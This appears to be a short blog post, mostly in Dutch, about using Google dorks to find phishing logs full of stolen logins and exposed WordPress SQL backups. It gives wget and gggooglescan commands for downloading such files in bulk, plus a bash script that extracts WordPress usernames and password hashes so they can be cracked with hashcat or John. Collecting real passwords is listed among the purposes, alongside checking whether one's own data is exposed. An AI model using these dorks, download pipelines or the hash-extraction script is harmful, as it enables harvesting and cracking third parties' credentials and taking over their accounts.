Fishy Google Dork ;-)

Fishy Google Dork 😉
Er wordt veel gephished op het web naar inloggegevens.
De bestanden waar deze info naar geschreven wordt moeten
voor de hacker ‘world writable’ zijn.
Grote kans dat ze via Google te vinden zijn.
Let’s find out.

Google Dork:
filetype:txt & intext:”email=” & intext:”pass=”

Resultaat:
About 104,000,000 results (0.26 seconds) !!!

Nu begeven we ons op glad ijs en is het nooit verstandig
om die pagina’s te bezoeken met een browser.
(Gezien driveby downloads, enz)

Hier komt wget goed van pas.
(Voor de windows users, deze is ook te krijgen voor Windows)

voorbeeld:
wget http://freemania.vipfree.us/old.log.txt
Inhoud:

lsd=AVoSGlLo
email=<removed>@facebook.com
pass=<removed>
persistent=1
default_persistent=1
charset_test=€,´,€,´,水,Д,Є
timezone=
lgnrnd=210122_IrmL
lgnjs=n
locale=en_US

 

Het nut hier van?

Meerdere mogelijkheden.
– verzamelen van echte wachtwoorden.
– tracen van hackers
– controleren of je eigen gegevens er niet in gevonden wordt.
– just for the fun of it

Automatiseren:
$ ./gggooglescan -d 50 ‘filetype:txt & intext:”email=” & intext:”pass=”‘ | tee -a fishy.log

Daarna kun je alle bestanden binnen halen met
$ wget -i fishy.log

zal ook veel onbruikbaar spul tussen zitten, maar ook voldoende wachtwoorden en inloggegevens.

WordPress Backups on Google

There are a lot of backup’s found on google. Google ‘dork’: filetype:sql inurl:wp-content/backup-* For automatic googling I use gggooglescan, works like a charm and I can output the scan to wget or whatever.

 ./gggooglescan -d 10 -l backupsql.log ‘filetype:sql inurl:wp-content/backup-*’

I find a few direct url’s to backup sql databasefiles. After downloading some with wget I want to get those hashes 🙂 so, little script I made: extractWPUserinfo.sh

#!/bin/bash
#
cat “$1” | grep “INSERT INTO \`wp_users\` VALUES” | sed “s/, /\n/g” | sed “s/INSERT INTO \`wp_users\` VALUES (/userid: /g” | sed “s/);/\n\n/g” | sed “s/’//g” > “$1″_WPuserinfo.txt
#
cat “$1″_WPuserinfo.txt | grep -o “$P$.*” > “$1″_WPuser_hashes.txt

I will give 2 files, 1 with all the userinfo, second only the hashes. You can use hashcat or John or whatever to bruteforce them. (WordPress hash bruteforcing is slow! it’s a kinda salted MD5 and then 42 times calculated)